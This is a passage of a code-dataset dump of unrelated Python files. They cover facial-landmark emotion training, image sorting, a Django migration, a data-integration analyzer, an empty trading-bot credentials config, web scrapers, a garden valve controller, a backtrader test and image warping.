0.1\n\n dist = float(width) / float(height)\n return dist\n\n\ndef dist_mouth_width(shape):\n den = abs(float(shape[13][0] - shape[3][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[54][0] - shape[48][0])) / den\n return dist\n\n\ndef dist_mouth_cheeks_right(shape):\n den = abs(float(shape[13][0] - shape[3][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[13][0] - shape[54][0])) / den\n return dist\n\n\ndef dist_mouth_cheeks_left(shape):\n den = abs(float(shape[13][0] - shape[3][0]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[48][0] - shape[3][0])) / den\n return dist\n\n\ndef dist_mouth_corner(shape):\n den = abs(float(shape[8][1] - shape[51][1]))\n if den == 0:\n den = 0.1\n dist = abs(float(shape[54][1] - shape[51][1])) / den\n return dist\n\n\n#MAIN\nif __name__ == \"__main__\":\n\n # INIT DETECTOR DLIB : Visage et traits\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n \n \n #Parcours les images de différentes emotions\n for folder in os.listdir(\"learning_images\"):\n for img in os.listdir(\"learning_images/\" + folder):\n # Charge l'image, la redimensionne et la met en noir et blanc\n image = cv2.imread(\"learning_images/\" + folder + \"/\" + img)\n image = imutils.resize(image, width=500)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n # Detection des visages\n rects = detector(gray, 1)\n face_detection(rects)\n result.append(folder)\n \n logreg = LogisticRegression(C=1e5, max_iter= 20000,solver='sag', multi_class='multinomial')\n logreg.fit(param, result)\n \n #Sauvegarder le model\n filename = \"learning_save.sav\"\n pickle.dump(logreg, open(filename, 'wb'))\n \n \n \n\n\n","sub_path":"face_learning/face_learning.py","file_name":"face_learning.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"472990256","text":"# !/usr/bin/python\n# coding:utf-8\n# 分類行書 隸書 楷書\n\nimport shutil, os\n\npath = '/Users/wei-chilan/Documents/python/ziWebCrawler/imgs'\nTargetFolder = '/Users/wei-chilan/Documents/python/ziWebCrawler/other'\nlist = os.listdir(path)\nfor filename in list:\n if not any(s in filename for s in (\"行書\", \"隸書\", \"楷書\")):\n print(filename)\n SourceFolder = os.path.join(path , filename)\n shutil.move(SourceFolder, TargetFolder)\n\n","sub_path":"classificateZi.py","file_name":"classificateZi.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496128816","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0002_convenetime'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='convenetime',\n name='chamber',\n field=models.OneToOneField(related_name='time_for', to='legislators.Chamber'),\n preserve_default=True,\n ),\n ]\n","sub_path":"txlege84/core/migrations/0003_auto_20150114_0126.py","file_name":"0003_auto_20150114_0126.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"355522339","text":"import collections\n\nfrom tqdm import tqdm\n\nfrom adapter import synthetic_dataset_adapter\nfrom config import constants\nfrom config.bdsa_config import _config_\nfrom config.constants import CLUSTER_ID\nfrom model import dataset\nfrom pipeline.pipeline_abstract import AbstractPipeline\nfrom pipeline.pipeline_common import analyze_clustering_results, ClusteringOutput\nfrom utils import string_utils, stats_utils, io_utils, experiment_utils, plot_utils\n\nISOLATED_ANALYSIS = 'Isolated Analysis'\n\nGLOBAL = 'Global'\n\nSA_MEASURES = 'Schema alignment measures'\nPAGE_MEASURES = 'Page linkage measures'\n\nF_MEASURE = 'F1'\nRECALL = 'R'\nPRECISION = 'P'\n\n\"\"\"\nCompute some statistics on schema alignment results, and outputs it in a readable way\n\"\"\"\n\nINTRA_EDGE = 'INTRA_EDGE'\nEXTRA_EDGE = 'EXTRA_EDGE'\nNODE = 'NODE'\n\nTYPE = 'type'\n\nWEIGHT = 'weight'\n\nNAME_2 = 'name2'\n\nSOURCE_NAME = 'source'\nSOURCE_2_NAME = 'source2'\n\nCLUSTER2_ID = 'cluster2'\n\nOCCURRENCES = 'occurrences'\nCARDINALITY = 'cardinality'\n\nCLUSTER_SIZE = 'cluster_size'\n\nTOP_3 = 'Top3'\nTOP_2 = 'Top2'\nTOP_1 = 'Top1'\n\nFILENAME_GRAPH_BUILT_CACHE = \"bdsa_output\"\n\nclass PipelineAnalyzer(AbstractPipeline):\n def __init__(self, tag_input):\n self._tag = tag_input\n\n def run(self, data: tuple):\n output = data[0]\n debug_stats = data[1]\n for cat, cat_data in output.items():\n stats = self.compute_stats_on_graph(cat_data, cat)\n if cat in debug_stats:\n stats.update(debug_stats[cat])\n if _config_.do_output_main_analysis():\n ds_synthesis, ds_details = self.get_clustering_results(cat_data)\n ds_synthesis.export_to_csv(_config_.get_analysis_output_dir(), \"%s_%s_%s\" % ('cluster_synthesis', self._tag, cat),\n True)\n ds_details.export_to_csv(_config_.get_analysis_output_dir(), \"%s_%s_%s\" % ('cluster_detail', self._tag, cat),\n True)\n io_utils.output_json_file(stats, \"%s_%s_%s\" % (FILENAME_GRAPH_BUILT_CACHE, self._tag, cat))\n\n def name(self):\n return \"Analyzer\"\n\n def need_input(self):\n return True\n\n def need_output(self):\n return False\n\n def compute_stats_on_graph(self, clustering_output: ClusteringOutput, category):\n stats = analyze_clustering_results(clustering_output)\n if _config_.do_synthetic_evaluation():\n self.compute_evaluation(stats, clustering_output)\n\n isolated = dataset.Dataset()\n for sa, row in clustering_output.sa_isolated.items():\n row['SA'] = sa\n isolated.add_row(row)\n isolated.export_to_csv(_config_.get_analysis_output_dir(), 'Isolated_%s' % category, with_timestamp=True)\n\n #isolated nodes are excluded from count\n att_cluster_sizes = [sum(len(sas) for sas in source2sas.values()) for source2sas in\n clustering_output.sa_clusters.values()]\n pages_cluster_sizes = [sum(len(pages) for pages in source2pages.values()) for source2pages in\n clustering_output.page_clusters.values()]\n\n if _config_.debug_mode():\n stats[ISOLATED_ANALYSIS] = self.analyze_isolated(clustering_output)\n stats['Linkage differencies'] = self.analyze_linkage_changes(clustering_output)\n stats[constants.STATS_ATTR_CLUSTER_SIZES] = stats_utils.GroupSize(att_cluster_sizes).__dict__\n stats[constants.STATS_PAGE_CLUSTER_SIZES] = stats_utils.GroupSize(pages_cluster_sizes).__dict__\n return stats\n\n def analyze_linkage_changes(self, clustering_output: ClusteringOutput):\n \"\"\"\n Analyze how the linkage changed after iterative linkage-alignment\n :return: \n \"\"\"\n old_linkage = collections.defaultdict(set)\n new_linkage_clusters = []\n old_isolated = []\n for source2pages in clustering_output.page_clusters.values():\n pages_pid_flattened = [page for pages in source2pages.values() for page in pages]\n new_linkage_clusters.append(pages_pid_flattened)\n for page in pages_pid_flattened:\n pids = clustering_output.old_url2pid.get(page.url, [])\n for pid in pids:\n old_linkage[pid].add(page)\n if len(pids) == 0:\n #add to isolated cluster\n old_isolated.append([page])\n for page in clustering_output.page_isolated:\n new_linkage_clusters.append([page])\n #TODO duplicated code\n pids = clustering_output.old_url2pid.get(page.url, [])\n for pid in pids:\n old_linkage[pid].add(page)\n if len(pids) == 0:\n # add to isolated cluster\n old_isolated.append([page])\n old_linkage_clusters = list(old_linkage.values())\n old_linkage_clusters.extend(old_isolated)\n new_link, old_link, union_link = experiment_utils.evaluate_expected_computed({}, new_linkage_clusters, old_linkage_clusters)[3:6]\n return {'TOTAL LINKAGES NOW':new_link, 'TOTAL old linkages': old_link, 'Linkages kept': union_link,\n 'New linkages created': new_link - union_link, 'Linkages deleted': old_link - union_link}\n\n def analyze_isolated(self, clustering_output: ClusteringOutput):\n \"\"\"\n Make some analysis on isolated sa/pages\n In particular classify sources according to isolated elements\n :return: \n \"\"\"\n print (\"Analyze isolated elements...\")\n source2sa_isolated = collections.defaultdict(int)\n source2sa_non_isolated = collections.defaultdict(int)\n source2page_isolated = collections.defaultdict(int)\n source2page_non_isolated = collections.defaultdict(int)\n all_sources = set()\n for source2sas in clustering_output.sa_clusters.values():\n for source, sas in source2sas.items():\n all_sources.add(source)\n source2sa_non_isolated[source] += len(sas)\n for sa in clustering_output.sa_isolated.keys():\n source2sa_isolated[sa.source] += 1\n all_sources.add(sa.source)\n for source2pages in clustering_output.page_clusters.values():\n for source, pages in source2pages.items():\n source2page_non_isolated[source] += len(pages)\n all_sources.add(source)\n for page in clustering_output.page_isolated:\n source2page_isolated[page.source] += 1\n all_sources.add(page.source)\n source2perc_sa_isolated = {}\n source2perc_page_isolated = {}\n source2size = {}\n alert_sources = set()\n for source in all_sources:\n nb_sa_isolated = source2sa_isolated.get(source, 0)\n nb_sa_non_isolated = source2sa_non_isolated.get(source, 0)\n nb_pages_isolated = source2page_isolated.get(source, 0)\n nb_pages_non_isolated = source2page_non_isolated.get(source, 0)\n total_nb_attributes = nb_sa_isolated + nb_sa_non_isolated\n total_nb_pages = nb_pages_isolated + nb_pages_non_isolated\n\n if total_nb_attributes == 0 or total_nb_pages == 0:\n raise Exception(\"The following source has no attribute or no pages, check input: %s\"%(str(source)))\n isolated_perc = nb_sa_isolated / float(total_nb_attributes) * 100\n source2perc_sa_isolated[source] = isolated_perc\n pages_isolated_perc = nb_pages_isolated / float(total_nb_pages) * 100\n source2perc_page_isolated[source] = pages_isolated_perc\n source2size[source] = total_nb_pages\n if pages_isolated_perc > 90 and isolated_perc > 90:\n alert_sources.add(str(source))\n #Now add %isolation info to isolated sa\n for sa, data in clustering_output.sa_isolated.items():\n data['PERC_ISOLATED_SA_SOURCE'] = source2perc_sa_isolated[sa.source]\n data['PERC_ISOLATED_PAGES_SOURCE'] = source2perc_page_isolated[sa.source]\n nb_sources = {}\n sum_sources_size = {}\n #Prepare data for plot\n for sa_axis in range(0,120,20):\n for page_axis in range(0,120,20):\n all_corresponding_sources = set(source for source, perc in source2perc_sa_isolated.items() if\n sa_axis <= perc and perc < sa_axis + 20) & set(\n source for source, perc in source2perc_page_isolated.items() if\n page_axis <= perc and perc < page_axis + 20)\n nb_sources[(sa_axis,page_axis)] = len(all_corresponding_sources)\n sum_sources_size[(sa_axis,page_axis)] = sum(source2size[source] for source in all_corresponding_sources)\n plot_utils.make_colormap(nb_sources, 'Isolated sources', 'Attributes isolated', 'Clusters isolated')\n plot_utils.make_colormap(sum_sources_size, 'Size of isolated sources', 'Attributes isolated', 'Clusters isolated')\n return list(alert_sources)\n\n\n def compute_evaluation(self, stats, clustering_output: ClusteringOutput):\n ## TODO those lines are specific to the type of input (synth/real)\n expected_sa_clusters, computed_sa_clusters = synthetic_dataset_adapter.golden_set_for_synthetic_data(\n clustering_output.sa_clusters, clustering_output.sa_isolated,\n lambda sa: sa.attname, lambda sa: synthetic_dataset_adapter.SyntheticSourceAttribute(sa))\n\n expected_page_clusters, computed_page_clusters = synthetic_dataset_adapter.golden_set_for_synthetic_data(\n clustering_output.page_clusters, clustering_output.page_isolated,\n lambda page: page.pid, lambda page: synthetic_dataset_adapter.SyntheticPage(page))\n\n source_categories = {'H_Source': lambda x: x.synth_source.ht == 'H', 'T_Source': lambda x: x.synth_source.ht == 'T',\n 'Missing linkage > 0.5': lambda x: x.synth_source.linkage_missing > 0.5,\n 'Missing linkage < 0.5': lambda x: x.synth_source.linkage_missing < 0.5,\n 'Linkage error 0.1': lambda x: x.synth_source.linkage_error == 0.1,\n 'Linkage error 0.01': lambda x: x.synth_source.linkage_error == 0.01,\n 'Value error 0.1': lambda x: x.synth_source.value_error == 0.1,\n 'Value error 0.01': lambda x: x.synth_source.value_error == 0.01\n }\n\n sa_categories = dict(source_categories)\n sa_categories.update({\n 'H_Attributes': lambda x: x.att_ht == 'H', 'T_Attributes': lambda x: x.att_ht == 'T',\n 'Card2': lambda x: x.cardinality == 2, 'Card3': lambda x: x.cardinality == 3,\n 'Card7': lambda x: x.cardinality == 7, 'Card10': lambda x: x.cardinality == 10,\n 'Card10+': lambda x: x.cardinality > 10\n })\n global_sa_results, specific_sa_results = experiment_utils.evaluate_dataset(computed_sa_clusters, expected_sa_clusters.values(),\n sa_categories)\n global_page_results, specific_page_results = experiment_utils.evaluate_dataset(computed_page_clusters, expected_page_clusters.values(),\n source_categories)\n stats[SA_MEASURES] = {}\n stats[SA_MEASURES][GLOBAL] = {PRECISION: global_sa_results.precision, RECALL: global_sa_results.recall,\n F_MEASURE: global_sa_results.f_measure}\n for cat, results in specific_sa_results.items():\n stats[SA_MEASURES][cat] = {PRECISION: results.precision, RECALL: results.recall,\n F_MEASURE: results.f_measure}\n\n stats[PAGE_MEASURES] = {}\n stats[PAGE_MEASURES][GLOBAL] = {PRECISION: global_page_results.precision, RECALL: global_page_results.recall,\n F_MEASURE: global_page_results.f_measure}\n for cat, results in specific_page_results.items():\n stats[PAGE_MEASURES][cat] = {PRECISION: results.precision, RECALL: results.recall,\n F_MEASURE: results.f_measure}\n\n def get_clustering_results(self, clustering_output: ClusteringOutput):\n \"\"\"\n Outputs 2 csv files representing the algorithm output\n * \"cluster synthesis\": a list of clusters, each with ID, number of attributes and most frequent attribute names\n * \"cluster details\": a list of attributes, each with cluster ID it belongs and most frequent attribute values\n :return:\n \"\"\"\n\n synhtesis = dataset.Dataset([constants.CLUSTER_ID, OCCURRENCES, TOP_1, TOP_2, TOP_3])\n details = dataset.Dataset([constants.CLUSTER_ID, CLUSTER_SIZE, SOURCE_NAME, constants.NAME, CARDINALITY, OCCURRENCES])\n\n for pid, source2sas in tqdm(clustering_output.sa_clusters.items(), desc='Build cluster output'):\n elements = [sa for sas in source2sas.values() for sa in sas]\n # for each cluster, find most common attribute names (but try to remove too similar names, see sort_attnames for details)\n attname2occs = stats_utils.count_elements(elements, lambda x: string_utils.folding_using_regex(x.name))\n att_name_sorted = self._sort_attnames(attname2occs)\n\n row = {CLUSTER_ID: pid, OCCURRENCES: len(elements), TOP_1: att_name_sorted[0], TOP_2: att_name_sorted[1],\n TOP_3: att_name_sorted[2]}\n synhtesis.add_row(row)\n for elem in elements:\n domain = clustering_output.sa_domain[elem]\n # now add rows to cluster details CSV.\n # For each attribute, find the 3 most frequent attribute values\n words = sorted(domain.items(), key = lambda x: x[1], reverse=True)[0:3]\n words.extend([''] * (3 - len(words))) #if <3 distinct values, we need to 'pad' the list\n row = {CLUSTER_ID: pid, CLUSTER_SIZE: len(elements), SOURCE_NAME: elem.source.site, constants.NAME : elem.name,\n CARDINALITY: len(domain),\n OCCURRENCES: sum(domain.values()),\n TOP_1: words[0], TOP_2: words[1], TOP_3: words[2]\n }\n details.add_row(row)\n return synhtesis, details\n\n def _sort_attnames(self, attname2occs, max_number_of_att_names = 3):\n \"\"\"\n Return the top 3 attribute names (most used in a cluster)\n Eliminate att names too similar to former ones (if we can find at least 3)\n Example: most frequent attribut names, sorted desc:\n --> max product size, size, product, max, viewfinder type, viewfinder, type\n --> OUTPUT: max product size, max, viewfinder type\n :param attname2occs: \n :param max_number_of_att_names: \n :return: \n \"\"\"\n att_name_sorted = sorted(attname2occs.keys(), key=lambda elem: attname2occs[elem], reverse=True)\n att_name_list = []\n att_name_removed = []\n i = 0\n while i < len(att_name_sorted) and len(att_name_list) < max_number_of_att_names:\n if any(att_name_sorted[i].split(' ') <= elem.split(' ') for elem in att_name_list):\n att_name_removed.append(att_name_sorted[i])\n else:\n att_name_list.append(att_name_sorted[i])\n i += 1\n att_name_list.extend(att_name_removed)\n return att_name_list[0:3] + [''] * (max_number_of_att_names - len(att_name_list))\n\n\n","sub_path":"pipeline/pipeline_analyzer.py","file_name":"pipeline_analyzer.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"540702852","text":"#KEEP ULTRA SAFE\n\nfrom random import seed\nfrom random import randint\n\nrandom.seed(10)\n\n# main\nBINANCE_KEY=\"\"\nBINANCE_SECRET=\"\"\n\n# overclocking mitigation.\n# create multiple API Instances and have them random loop through class below.\n# binance - Can you make these juggle?\nBINANCE_KEY_v1=\"\"\nBINANCE_SECRET_v1=\"\"\n\nBINANCE_KEY_v2=\"\"\nBINANCE_SECRET_v2=\"\"\n\nBINANCE_KEY_v3=\"\"\nBINANCE_SECRET_v3=\"\"\n\n\nBINANCE_KEY_v4=\"\"\nBINANCE_SECRET_v4=\"\"\n\n# unrestricted\nBINANCE_KEY_v5=\"\"\nBINANCE_SECRET_v5=\"\"\n\nBINANCE_KEY_v6=\"\"\nBINANCE_SECRET_v6=\"\"\n\nBINANCE_KEY_v7=\"\"\nBINANCE_SECRET_v7=\"\"\n\n\n# robinhood\nrh_username = \"\"\nrh_password = \"\"\n\n","sub_path":"Binance Trading Bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276997553","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 15:14:26 2018\n\n@author: brookeerickson\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nfrom requests import get\nimport re\n\n\n'''FUNCTION: GO THROUGH LIST OF TAGS AND ADD ALL LINKS TO A LIST\n OUTPUT: LIST OF HTML INFO ASSOCIATED WITH EACH TAG'''\ndef tags_by_date(TAGS, links, html_soup):\n #first page: tag is of type class\n tag_type,tag = TAGS[0]\n links_page = html_soup.find_all(tag_type, class_ = tag) \n for each in links_page:\n links.append(each)\n #second page: tag is of type id\n tag_type,tag = TAGS[1]\n links_page = html_soup.find_all(tag_type, id = tag) \n for each in links_page:\n links.append(each) \n #links is a list after going through all pages\n return links\n\n\n'''FUNCTION: FIND ALL ANCHOR TAGS IN EACH OBJECT OF LINKS\n INPUT: LINKS\n OUTPUT: PDF_LINKS, XLSX_LINKS, LINKS_VISITED, ALL_LINKS'''\ndef scrape_page(current, links, prefix_length, URL_PREFIX, pdf_links, xlsx_links, links_visited, all_links):\n for each in links:\n #find all anchor tags and url's\n anchor_tags = each.find_all('a',href=True)\n for link in anchor_tags:\n if 'pdf' in link.text:\n #if the text in the website for this link says pdf\n pdf_url= link['href']\n if pdf_url[:prefix_length] != URL_PREFIX:\n #append URL_PREFIX if necessary\n pdf_url = URL_PREFIX+str(pdf_url)\n if pdf_url not in links_visited:\n #only use link if it has not already been visited\n links_visited.append(pdf_url)\n pdf_links.append(pdf_url)\n else:\n #if the text in the website for this link does not say pdf\n url= link['href']\n if url[:prefix_length] != URL_PREFIX:\n #append URL_PREFIX if necessary\n url = URL_PREFIX+str(url)\n if url not in links_visited:\n #only use link if it has not already been visited\n links_visited.append(url)\n all_links.append(url)\n if 'pdf' in current:\n pdf_links.append(current)\n elif 'xlsx' in current:\n xlsx_links.append(current)\n #remove current url from all_links and add to links_visited\n all_links.remove(current)\n links_visited.append(current)\n return pdf_links, xlsx_links, links_visited, all_links\n\n\n'''FUNCTION: COMBINE ALL ABOVE FUNCTIONS FOR WEBSITE'S MAIN PAGE\n OUTPUT: list of pdf_links and xlsx_links'''\ndef one_page(prefix_length, URL_PREFIX, TAGS, all_links, pdf_links, xlsx_links, links_visited, PRINT_MODE):\n #continue to repeat process while there are more links in the list all_links\n while all_links:\n current = all_links[0]\n response = get(current)\n html_soup = BeautifulSoup(response.text, 'lxml')\n \n links,pages = tags_by_date(TAGS, [], html_soup)\n \n pdf_links, xlsx_links, links_visited, all_links = scrape_page(current, links, prefix_length, URL_PREFIX, pdf_links, xlsx_links, links_visited, all_links)\n \n if PRINT_MODE: \n print ('all_links')\n print (all_links)\n print ('links_visited')\n print (len(links_visited))\n print (links_visited)\n print ('pdf_links')\n print (len(pdf_links))\n for i in pdf_links:\n print (i)\n print ('xlsx_links')\n print (len(xlsx_links))\n for i in (xlsx_links):\n print (i)\n \n return pdf_links, xlsx_links\n\n\n'''FUNCTION: SCRAPE THE WEBSITE'''\ndef scrape_website(URL, TAGS, pdf_links = [], xlsx_links = [], links_visited = [], PRINT_MODE=True):\n\n URL_PREFIX = re.search('.*org/|.*com/|.*edu/',URL).group(0)\n prefix_length = len(URL_PREFIX)\n all_links = [URL]\n\n pdf_links, xlsx_links = one_page(prefix_length, URL_PREFIX, TAGS, all_links, pdf_links, xlsx_links, links_visited, PRINT_MODE)\n \n return pdf_links, xlsx_links\n \n#################################################################################\nURL = 'http://ggim.un.org/knowledgebase/'\nTAGS = [('div','i-panel-content'),('div','ctl00_ctlContentPlaceHolder_ctl00_ctl00_ctl00_ctl00_ctlPanelBar_ctlViewArticleAttachments_ctl00_ctlViewAttachments_ctl00_ctlDataList')]\n\npdf_links, xlsx_links = scrape_website(URL, TAGS)","sub_path":"autoidentification/specialized/WebScrapeGGIM.py","file_name":"WebScrapeGGIM.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"206765555","text":"import numpy as np\nfrom reader import enqueuer, get_vocab, Vocab\n\nclass InputData(object):\n \"\"\"The input data.\"\"\"\n def __init__(self, config, data, name=None):\n # if testset:\n # do something different for input_data and targets\n # - We can discard targets and just look at relative ratios\n self.vocab_size = config.vocab_size\n self.batch_size = batch_size = config.batch_size\n self.num_steps = num_steps = config.num_steps\n self.epoch_size = ((len(data) // batch_size) - 1) // num_steps\n self.input_data, self.targets = enqueuer(data, batch_size, num_steps, name=name)\n\n\nclass TestData(object):\n \"\"\"The input data for tester\"\"\"\n def __init__(self, config, test_data, test_meta, vocab, name=None):\n data = test_data\n max_seq_len = max([len(seq) for seq in data])\n self.meta = test_meta\n self.vocab = vocab\n self.vocab_size = config.vocab_size\n self.num_steps = max_seq_len - 1\n self.batch_size = len(data)\n self.epoch_size = 1\n test_inp = np.zeros((self.batch_size, self.num_steps), dtype=int) + vocab.getid(vocab.eos)\n test_targ = np.zeros((self.batch_size, self.num_steps), dtype=int) + vocab.getid(vocab.eos)\n\n for irow, trow, seq in zip(test_inp, test_targ, data):\n irow[0:len(seq)-1] = np.array(seq[0:-1]).astype(int)\n trow[0:len(seq)-1] = np.array(seq[1:]).astype(int)\n self.input_data = test_inp\n self.targets = test_targ\n\ndef main():\n import reader as reader\n from trainer import Configs\n from PDPATH import PDPATH\n\n ptb_vocab = get_vocab('ptb.voc')\n raw_test_data = reader.make_test(PDPATH('/RNN/test_data/coffee.txt'), ptb_vocab)\n\n test_input = TestData(config=Configs(),\n test_data=raw_test_data,\n vocab=ptb_vocab,\n name=\"TestInput\")\n\n\nif __name__=='__main__': main()","sub_path":"classes/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"103616596","text":"\n# create object for each bed and try to develop some logic for the beds to know\n# where they can draw or dump to\n\nclass Bed:\n def __init__(self, column, row):\n self.col = column\n self.row = row\n self.target = None\n self.target_min = -1\n self.target_max = -1\n self.water_level = -1\n self.valve_status = None\n self.capacity = -1\n # self.target = 'Fill'\n # self.target_min = 20\n # self.target_max = 30\n # self.water_level = 0\n # self.valve_status = 'close'\n # self.capacity = 100\n # whether or not the bed is at the right level\n self.happy = False\n\n def __str__(self):\n # return(f\"{self.row}{self.col}, Level:{self.current_level}, Targ:{self.target}, Valve:{self.valve_status}, Happy:{self.happy}\")\n return \"{}{}: Level:{}, Targ:{}, FillMin:{}, Valve:{}, Happy:{}\" \\\n .format(self.col, self.row, self.water_level, self.target, self.target_min, self.valve_status, self.isHappy())\n\n def setValve(self, state, client, user):\n # if valve was asked to open and is currently closed\n if state == 'open' and self.valve_status == 'close':\n client.publish(f\"{user}/bed-{self.row}{self.col}/valve/set\", 'open')\n # if valve was asked to close and is currently open\n elif state == 'close' and self.valve_status == 'open':\n client.publish(f\"{user}/bed-{self.row}{self.col}/valve/set\", 'close')\n\n # returns if bed has correct level\n def isHappy(self):\n return ((self.target == 'Fill') and (self.water_level > self.target_min)) or \\\n ((self.target == 'Empty') and (self.water_level == 0))\n","sub_path":"bed.py","file_name":"bed.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"153250060","text":"#!/usr/bin/env python\n# -*- coding: utf-8; py-indent-offset:4 -*-\n###############################################################################\n#\n# Copyright (C) 2018 Daniel Rodriguez\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n###############################################################################\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport backtrader as bt\nfrom datetime import datetime\nimport csv\n\nclass St(bt.Strategy):\n def logdata(self):\n txt = []\n txt.append('{}'.format(len(self)))\n txt.append('{}'.format(self.data.datetime.datetime(0).isoformat()))\n txt.append('{:.2f}'.format(self.data.open[0]))\n txt.append('{:.2f}'.format(self.data.high[0]))\n txt.append('{:.2f}'.format(self.data.low[0]))\n txt.append('{:.2f}'.format(self.data.close[0]))\n txt.append('{:.2f}'.format(self.data.volume[0]))\n\n f = open('output_ib.txt', 'a')\n f.write(','.join(txt))\n f.close()\n\n data_live = False\n\n def notify_data(self, data, status, *args, **kwargs):\n f = open('output_ib.txt', 'a')\n f.write('*' * 5 + 'DATA NOTIF:' + data._getstatusname(status))\n f.close()\n\n if status == data.LIVE:\n self.data_live = True\n\n\ncerebro = bt.Cerebro()\n\ncerebro.addstrategy(St)\n\nibstore = bt.stores.IBStore(host='127.0.0.1', port=7497, clientId=100)\n\ndatalist = [\n 'GOOG',\n # 'SP500',\n # 'EURUSD',\n # 'GC',\n # 'C',\n # 'UD.C',\n]\n\n#Loop through the list adding to cerebro. MODIFIED\nfor i in range(len(datalist)):\n data = ibstore.getdata( dataname=datalist[i], timeframe=bt.TimeFrame.Seconds, compression = 5)\n cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=5)\n\ncerebro.run()","sub_path":"181202_IB_test.py","file_name":"181202_IB_test.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"323488133","text":"# Librarires Import\nimport urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nurl = \"https://buffalo.campuslabs.com/engage/events\"; # URL Page from where we are scraping\nbrowser = webdriver.PhantomJS(); # webdriver to load the data properly\nbrowser.get(url);\nhtml = browser.page_source;\n#\nsoup = BeautifulSoup(html, 'lxml');\ndivs = soup.findAll('div',{'id':'event-discovery-list'});\nparent_div = divs[0];\ndivs = parent_div.findAll('a')\ncount=0\nevents=[]\ndates=[]\nclubs=[]\nfor div in divs:\n event = div.find('h3').get_text()\n events.append(event)\n club = div.findAll('span')[3].get_text()\n clubs.append(club)\n time = div.get_text().replace(event,\"\")\n time = time.replace(club,\"\")\n dates.append(time)\nwtr = csv.writer(open ('out_clubs.csv', 'a'), delimiter=',', lineterminator='\\n')\nfor f, b,c in zip(clubs, events,dates):\n wtr.writerow ([f,b,c])\n","sub_path":"web_scraper-link2.py","file_name":"web_scraper-link2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260463329","text":"# warp image\n\nimport cv2\nimport os\nimport numpy as np\nfrom LivestockCV.core import print_image\nfrom LivestockCV.core import plot_image\nfrom LivestockCV.core import fatal_error\nfrom LivestockCV.core import color_palette\nfrom LivestockCV.core import params\nfrom LivestockCV.core.figures import overlay_two_imgs\n\n\ndef warp(img, refimg, pts, refpts, method='default'):\n \"\"\"Warp an image to another perspective\n\n Inputs:\n img = grayscale or binary image data to be warped\n refimg = RGB or grayscale image data to be used as reference\n pts = 4 coordinates on img1\n refpts = 4 coordinates on img2\n method = method of finding the transformation. 'default', 'ransac', 'lmeds', 'rho'\n Returns:\n warped_img = warped image\n\n :param img: numpy.ndarray\n :param refimg: numpy.ndarray\n :param pts: list of tuples\n :param refpts: list of tuples\n :param method: str\n :return warped_img: numpy.ndarray\n \"\"\"\n\n params.device += 1\n\n if len(pts) != 4 or len(refpts) != 4:\n fatal_error('Please provide 4 pairs of corresponding coordinates.')\n if len(img.shape) > 2:\n fatal_error('The input `img` should be grayscale or binary.')\n\n methods = {\n 'default': 0,\n 'ransac': cv2.RANSAC,\n 'lmeds': cv2.LMEDS,\n 'rho': cv2.RHO}\n\n shape_ref = refimg.shape\n rows_ref, cols_ref = shape_ref[0:2]\n\n # convert list of tuples to array for cv2 functions\n ptsarr = np.array(pts, dtype='float32')\n refptsarr = np.array(refpts, dtype='float32')\n\n # find tranformation matrix and warp\n mat, _ = cv2.findHomography(ptsarr, refptsarr, method=methods.get(method))\n warped_img = cv2.warpPerspective(src=img, M=mat, dsize=(cols_ref, rows_ref))\n\n # preserve binary\n if len(np.unique(img)) == 2:\n warped_img[warped_img > 0] = 255\n\n if params.debug is not None:\n # scale marker_size and line_thickness for different resolutions\n rows_img = img.shape[0]\n if rows_img > rows_ref:\n res_ratio_i = int(np.ceil(rows_img/rows_ref)) # ratio never smaller than 1 with np.ceil\n res_ratio_r = 1\n else:\n res_ratio_r = int(np.ceil(rows_ref/rows_img))\n res_ratio_i = 1\n # marker colors\n colors = color_palette(len(pts))\n\n # temp rgb image for colored markers on 